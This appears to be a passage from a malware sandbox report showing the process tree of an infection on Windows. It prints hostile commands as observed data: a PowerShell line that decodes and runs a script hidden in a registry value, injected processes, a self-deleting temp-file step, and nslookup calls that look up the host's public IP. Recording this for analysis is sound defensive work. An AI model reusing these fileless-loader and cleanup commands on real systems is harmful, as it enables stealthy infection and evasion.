C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05").dmrctcls))3⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oeqm3irn\oeqm3irn.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CB1.tmp" "c:\Users\Admin\AppData\Local\Temp\oeqm3irn\CSC2B1C7562C654D51BAA1FBDA80763CB1.TMP"5⤵PID:272
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r22l0bf4\r22l0bf4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D8C.tmp" "c:\Users\Admin\AppData\Local\Temp\r22l0bf4\CSCB7F26E51CB9C4DA197DF3A841B3278.TMP"5⤵PID:1100
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BNAC5B.tmp"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1784 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:812
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\E908.bi1"2⤵PID:1956
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1760
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\4444.bi1"2⤵PID:1940
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1748
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E908.bi1"2⤵PID:1072
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4444.bi1"2⤵PID:1192
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1560 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1560 CREDAT:275457 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1876
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1560 CREDAT:406535 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2040
-